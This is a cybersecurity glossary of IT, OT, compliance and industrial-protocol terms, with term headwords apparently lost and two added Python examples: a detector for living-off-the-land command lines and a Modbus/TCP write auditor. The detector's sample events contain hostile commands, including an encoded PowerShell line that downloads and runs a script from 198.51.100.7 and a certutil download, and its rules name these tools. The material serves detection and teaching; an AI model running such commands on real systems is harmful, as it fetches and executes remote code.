Cybersecurity Glossary
84 terms covering IT security, OT security, compliance and industrial protocols.
A
Physical isolation of a network or system from all other networks, including the Internet, used as a security measure for critical infrastructure. An air gap blocks network-borne attacks only; it does not by itself protect against removable media, portable maintenance laptops or other devices that are temporarily connected across it.
An Advanced Persistent Threat - a long-term, targeted cyber operation conducted by a highly skilled actor, often state-affiliated.
B
A communication protocol designed for building automation, enabling integration of HVAC, lighting, access control and fire protection systems. Classic BACnet/IP carries no authentication or encryption; BACnet Secure Connect (BACnet/SC) adds TLS-protected transport.
An integrated platform for web application security testing, enabling interception, analysis and modification of HTTP/HTTPS traffic.
C
A Cloud Access Security Broker - a control layer between users and cloud services that enforces security and data protection policies.
A set of 18 prioritised security actions developed by the Center for Internet Security - a practical guide to defending against the most common attacks.
The infrastructure and communication channels used by an attacker to remotely control compromised systems and exfiltrate data.
An EU regulation imposing cybersecurity requirements on products with digital elements placed on the European market.
Unauthorised use of the victim's computing resources to mine cryptocurrency - often with no visible symptoms other than performance degradation.
A vulnerability scoring system that assigns a base score from 0.0 to 10.0, computed from exploitability metrics (attack vector, attack complexity, privileges required, user interaction) and impact metrics (confidentiality, integrity, availability, scope). Used to standardise the assessment of vulnerability severity. The base score measures severity, not the likelihood of exploitation or the risk to a specific organisation, so it should not be the only input to patch prioritisation.
A model describing the seven phases of a cyberattack: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. Helps plan detection and defences at every stage, on the principle that breaking any one link disrupts the whole attack.
D
A network device enforcing unidirectional data flow, making any traffic in the reverse direction physically impossible - used to protect critical networks.
A distributed control system used in process industries for automating continuous production processes such as refining or chemical manufacturing.
A security strategy based on multiple overlapping layers of protection. The failure of one layer does not lead to compromise of the entire system.
The discipline of preserving, recovering and analysing digital evidence in a manner that maintains its evidentiary value.
Data Loss Prevention - technologies and processes that detect and block unauthorised transfer, copying or sharing of confidential information.
A communication protocol used in energy and critical infrastructure for reliable data exchange between master stations and field devices over unreliable links. Plain DNP3 has no authentication; DNP3 Secure Authentication (part of IEEE 1815) adds challenge-response authentication of critical messages.
An EU regulation on the digital operational resilience of the financial sector. Requires ICT risk management, ICT incident reporting, oversight of third-party ICT providers and, for financial entities designated by their competent authorities, threat-led penetration testing (TLPT).
E
An endpoint detection and response system that monitors process activity, file changes and network connections on devices to detect and stop threats.
An industrial communication protocol based on standard Ethernet and the CIP model, used for real-time control and data exchange in automation environments.
F
A family of digital communication protocols used to connect field devices with controllers in industrial automation installations.
An engineering discipline ensuring that control and safety systems respond correctly to hazardous conditions, minimising risk to people and the environment.
H
A communication protocol that enables digital data transmission over traditional 4-20 mA analogue lines in industrial installations.
Human-Machine Interface - a panel or application that enables an operator to visualise an industrial process and issue control commands.
A deliberately exposed decoy system mimicking real assets to attract attackers, detect intrusion attempts and gather data about attack techniques.
I
Identity and Access Management - a framework of processes and technologies ensuring that the right users have the right access to the right resources at the right time.
Industrial Control Systems - a general term for industrial automation systems encompassing SCADA, DCS, PLC and other components that control processes.
A series of international standards defining security requirements for industrial automation and control systems (IACS), addressed to asset owners, system integrators and product suppliers. It introduces the concepts of zones and conduits and graded security levels (SL 1 to SL 4) against which systems and components are assessed.
An organised process for detecting, analysing, containing and recovering from security incidents - from preparation through to lessons learned.
A buffer zone between the corporate IT network and the industrial OT network, enabling controlled data exchange without a direct connection between the two.
A security threat originating from a person with authorised access to organisational resources - an employee, contractor or business partner.
An international standard specifying requirements for an information security management system (ISMS). The foundation for organisational security certification.
L
The technique of an attacker moving between systems within a compromised network to gain access to higher-value assets.
An attack technique that leverages legitimate system tools (PowerShell, WMI, certutil) instead of malware - making detection significantly harder.
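Because living-off-the-land activity uses signed, legitimate binaries, detection has to key on how they are invoked rather than on what they are. The following is an added example, not code from the original glossary: a handful of detection rules run over process-creation events shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage), covering the three tools named above. The events, host names, paths and the 198.51.100.7 address are constructed for illustration, and the encoded PowerShell payload is built inside the script so the reader can see exactly what the decoder recovers.

```python
"""Detecting living-off-the-land command lines.

Added example, not part of the original glossary. Runs a small set of
detection rules over process-creation events (Sysmon Event ID 1 shape) and
decodes PowerShell -EncodedCommand payloads. All events below are constructed;
hosts, paths and the URL are made up.
"""
import base64
import re

# Each rule: (name, regex over the command line). Patterns target abusive
# invocations of the legitimate tools named in the glossary entry.
RULES = [
    ("powershell_encoded_command",
     re.compile(r"powershell(?:\.exe)?.*\s-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell_hidden_download",
     re.compile(r"powershell(?:\.exe)?.*(?:-w(?:indowstyle)?\s+hidden|downloadstring|iex\b|invoke-expression)", re.I)),
    ("certutil_download_or_decode",
     re.compile(r"certutil(?:\.exe)?.*\s-(?:urlcache|decode|encode)\b", re.I)),
    ("wmic_remote_process_create",
     re.compile(r"wmic(?:\.exe)?.*\s/node:.*process\s+call\s+create", re.I)),
]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE text), or None if the command line carries no decodable payload."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return a list of (rule_name, host, command_line, decoded_payload) findings."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append((name, ev["Host"], cmd, decode_encoded_command(cmd)))
    return findings


# Constructed sample events. The encoded payload is produced here, the same
# way an attacker's tooling would produce it (base64 over UTF-16LE).
_payload = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
_encoded = base64.b64encode(_payload.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"Host": "WS-0417", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_encoded}"},
    {"Host": "WS-0417", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt"},
    {"Host": "WS-0417", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic /node:FS-01 process call create "cmd /c whoami > C:\tmp\o.txt"'},
    # Benign administration: a scheduled maintenance script, no encoding or download.
    {"Host": "SRV-DB02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup-rotate.ps1"},
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, host, cmd, decoded in run_sample():
        print(f"[{rule}] {host}: {cmd[:70]}")
        if decoded:
            print("    decoded:", decoded)
```

The benign scheduled script on SRV-DB02 produces no finding, which is the point: rules like these are only useful when tuned against the organisation's own baseline of legitimate administrative use, otherwise PowerShell-heavy environments drown in alerts.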
M
The process of examining malicious software to understand its functionality, mechanisms, C2 infrastructure and detection opportunities.
A penetration testing platform containing thousands of exploit modules together with auxiliary (scanning and reconnaissance) modules, payloads and post-exploitation tools in a single environment.
Multi-factor authentication - an identity verification method requiring at least two independent factors from different categories: something you know (a password or PIN), something you have (a hardware token, smart card or phone) and something you are (a biometric). Two passwords are not two factors.
A knowledge base of adversary tactics, techniques and procedures. Used to classify threats and assess an organisation's detection capabilities.
One of the oldest and most widely used communication protocols in industrial automation, in serial (Modbus RTU) and TCP/IP (Modbus TCP, port 502) variants. It has no built-in authentication or encryption, so any host that can reach a device can read and write its coils and registers; the separate Modbus/TCP Security specification adds TLS.
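With no authentication in the protocol, the only control left is knowing which hosts are allowed to write to which devices and checking traffic against that policy. The following is an added example, not code from the original glossary: it parses Modbus/TCP frames (the 7-byte MBAP header and the PDU that follows it, as laid out in the Modbus messaging implementation guide) and flags write requests from hosts outside an allow-list, plus frames whose length field disagrees with their size. The frames, IP addresses and allow-list are constructed for illustration.

```python
"""Auditing Modbus/TCP traffic for unauthenticated writes.

Added example, not part of the original glossary. Parses MBAP + PDU frames
and reports write function codes sent by hosts that policy does not permit
to write to the target device. All frames, addresses and the allow-list
below are constructed for illustration.
"""
import struct

# Public function codes that change device state.
WRITE_FUNCTIONS = {
    5: "Write Single Coil",
    6: "Write Single Register",
    15: "Write Multiple Coils",
    16: "Write Multiple Registers",
    22: "Mask Write Register",
    23: "Read/Write Multiple Registers",
}


def parse_frame(frame: bytes) -> dict:
    """Decode the 7-byte MBAP header and the PDU that follows it.

    MBAP: transaction id (2), protocol id (2, always 0 for Modbus), length
    (2: number of bytes that follow, unit id included), unit id (1).
    PDU: function code (1) followed by function-specific data.
    """
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header and function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:
        raise ValueError(f"length field {length} disagrees with frame size {len(frame) - 6}")
    func = frame[7]
    data = frame[8:]
    info = {"tid": tid, "unit": unit, "function": func, "data": data}
    # Read requests and the common write requests start with a 16-bit address
    # followed by a quantity (reads, multi-writes) or a value (single writes).
    if func in (1, 2, 3, 4, 5, 6, 15, 16) and len(data) >= 4:
        info["address"], info["quantity_or_value"] = struct.unpack(">HH", data[:4])
    if func >= 0x80:  # exception response: function code with high bit set
        info["exception"] = data[0] if data else None
    return info


def audit(frames, allowed_writers):
    """frames: iterable of (src_ip, dst_ip, raw_frame).
    allowed_writers: {dst_ip: {src_ip, ...}} hosts permitted to write to each device.
    Returns a list of finding strings, in capture order."""
    findings = []
    for src, dst, raw in frames:
        try:
            f = parse_frame(raw)
        except ValueError as e:
            findings.append(f"MALFORMED {src}->{dst}: {e}")
            continue
        name = WRITE_FUNCTIONS.get(f["function"])
        if name is None:
            continue  # reads are not policy violations here
        if src not in allowed_writers.get(dst, set()):
            findings.append(
                f"UNAUTHORISED WRITE {src}->{dst} unit {f['unit']}: {name} "
                f"(fc {f['function']}) at address {f.get('address')}")
    return findings


# Constructed capture: an engineering workstation (10.1.1.20) and an unknown
# host (10.1.1.77) talking to two PLCs. Hex groups follow the MBAP/PDU layout.
SAMPLE_FRAMES = [
    # EWS reads 10 holding registers from PLC-1 (fc 3): benign.
    ("10.1.1.20", "10.1.2.10", bytes.fromhex("0001 0000 0006 01 03 0000 000A")),
    # EWS writes register 16 on PLC-1 (fc 6): permitted by policy.
    ("10.1.1.20", "10.1.2.10", bytes.fromhex("0002 0000 0006 01 06 0010 1234")),
    # Unknown host writes two registers on PLC-2 (fc 16): not permitted.
    ("10.1.1.77", "10.1.2.11", bytes.fromhex("0003 0000 000B 01 10 0000 0002 04 000A 000B")),
    # Unknown host forces coil 5 ON on PLC-1 (fc 5, value FF00): not permitted.
    ("10.1.1.77", "10.1.2.10", bytes.fromhex("0004 0000 0006 01 05 0005 FF00")),
    # Truncated frame whose length field does not match: malformed.
    ("10.1.1.77", "10.1.2.10", bytes.fromhex("0005 0000 0006 01 03 0000")),
]

ALLOWED_WRITERS = {"10.1.2.10": {"10.1.1.20"}, "10.1.2.11": {"10.1.1.20"}}


def run_sample():
    return audit(SAMPLE_FRAMES, ALLOWED_WRITERS)


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

In a real deployment the frames would come from a span port or a tap feeding a parser such as Wireshark's Modbus dissector or an NDR sensor; the allow-list check is the same. Note that a source address is all the policy can rely on, and it is spoofable, which is exactly why network segmentation (zones and conduits) matters more for Modbus than for protocols that authenticate their peers.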
N
A network detection and response system that analyses packets and flows to identify anomalies and known attack patterns in network traffic.
An EU directive establishing cybersecurity requirements for essential and important entities. Covers risk management, incident reporting and supply chain security.
The NIST guide to operational technology security - a compendium of best practices for protecting ICS and OT environments.
The NIST Cybersecurity Framework - voluntary guidelines helping organisations manage cyber risk through six functions: govern, identify, protect, detect, respond, recover.
An open-source network scanning and security auditing tool for host discovery, service identification and vulnerability detection.
O
A modern industrial communication protocol with built-in security mechanisms. Enables data exchange between devices from different manufacturers.
An operational security testing methodology defining metrics and processes for assessing security across five channels: human, physical, wireless, telecommunications and network.
The process of identifying, inventorying and monitoring all devices and systems in industrial networks - the foundation of an effective OT cybersecurity programme.
Protection of operational technology (OT) systems against cyber threats. Covers securing industrial networks, devices and protocols.
A list of the ten most critical web application security risk categories, published by OWASP - the standard for application security awareness.
P
Privileged Access Management - a set of practices and tools for controlling, monitoring and auditing elevated-privilege accounts within an organisation.
The Payment Card Industry Data Security Standard defining requirements for organisations that process, store or transmit cardholder data.
A controlled attack simulation against IT systems to discover vulnerabilities before a real attacker exploits them.
A social engineering technique involving impersonation of a trusted entity to steal credentials, personal data or trick the victim into performing a harmful action.
Programmable Logic Controller - a device that controls industrial processes based on programmed logic and sensor inputs.
The Polish Act on the National Cybersecurity System implementing the NIS Directive, regulating obligations of essential service operators and digital service providers.
An engineering discipline focused on preventing catastrophic failures in industrial installations by managing risks associated with hazardous materials and high-energy processes.
An open industrial communication standard based on Ethernet, providing real-time data exchange between controllers and field devices.
The Penetration Testing Execution Standard defining seven test phases - pre-engagement interactions, intelligence gathering, threat modelling, vulnerability analysis, exploitation, post-exploitation and reporting - ensuring repeatability and comprehensiveness.
A hierarchical reference model describing the layers of network architecture in industrial environments - from field devices to business systems.
R
Malicious software that encrypts the victim's data and demands a ransom for decryption. Today it is often combined with data theft and double extortion.
An advanced attack simulation covering the full spectrum of techniques - from social engineering to system exploitation - conducted under conditions close to a real threat.
The process of analysing software, firmware or a protocol to understand its operation without access to the source code.
Remote Terminal Unit - a device that collects data from field sensors and transmits it to a SCADA system via telecommunications links.
S
An isolated execution environment for safely running and analysing suspicious software without risk to production systems.
A network architecture combining networking functions (SD-WAN) and security (CASB, SWG, ZTNA, FWaaS) in a single cloud-delivered platform.
A supervisory control and data acquisition system enabling remote monitoring and control of industrial processes in real time.
A system for centrally collecting, correlating and analysing security logs from multiple sources to detect threats and support incident response.
An independent automation system responsible for bringing a process to a safe state when a hazardous condition is detected.
A platform combining security tool orchestration, incident response automation and case management in a single solution.
Security Operations Centre - the team and infrastructure responsible for continuous monitoring, detection and response to security incidents.
An auditing standard defining requirements for security, availability, processing integrity, confidentiality and privacy for service providers.
A targeted phishing attack aimed at a specific individual or organisation, using personalised information to increase message credibility.
A cyber-attack targeting an organisation through compromise of its software vendor, service provider or component supplier - bypassing the target's direct defences.
T
Proactively searching IT/OT infrastructure to detect threats that have evaded automated detection systems - conducted by experienced analysts.
The systematic collection, analysis and use of information about cyber threats to support informed decisions about organisational defence.
Threat-Led Penetration Testing - an advanced form of security assessment, modelled on the TIBER-EU framework, that DORA requires of financial entities designated by their competent authorities at least every three years, run against live production systems.
W
A web application firewall that filters and monitors HTTP traffic between the Internet and a web application, protecting against attacks such as SQL injection and XSS.
Malicious software designed solely to permanently destroy data or damage victim systems - with no possibility of data recovery.
An open-source network protocol analyser enabling real-time packet capture and detailed inspection of network traffic.